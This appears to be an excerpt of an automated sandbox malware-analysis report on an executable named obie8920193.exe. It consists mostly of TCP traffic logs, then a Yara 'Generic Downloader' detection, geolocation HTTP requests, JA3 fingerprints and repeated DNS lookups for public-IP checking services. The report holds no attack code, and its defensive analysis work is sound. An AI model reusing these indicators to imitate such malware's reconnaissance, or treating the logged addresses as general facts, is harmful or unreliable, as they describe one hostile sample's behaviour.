            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 193.122.6.168:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 158.101.44.242:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 193.122.130.0:80 -> 192.168.2.22:49175
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
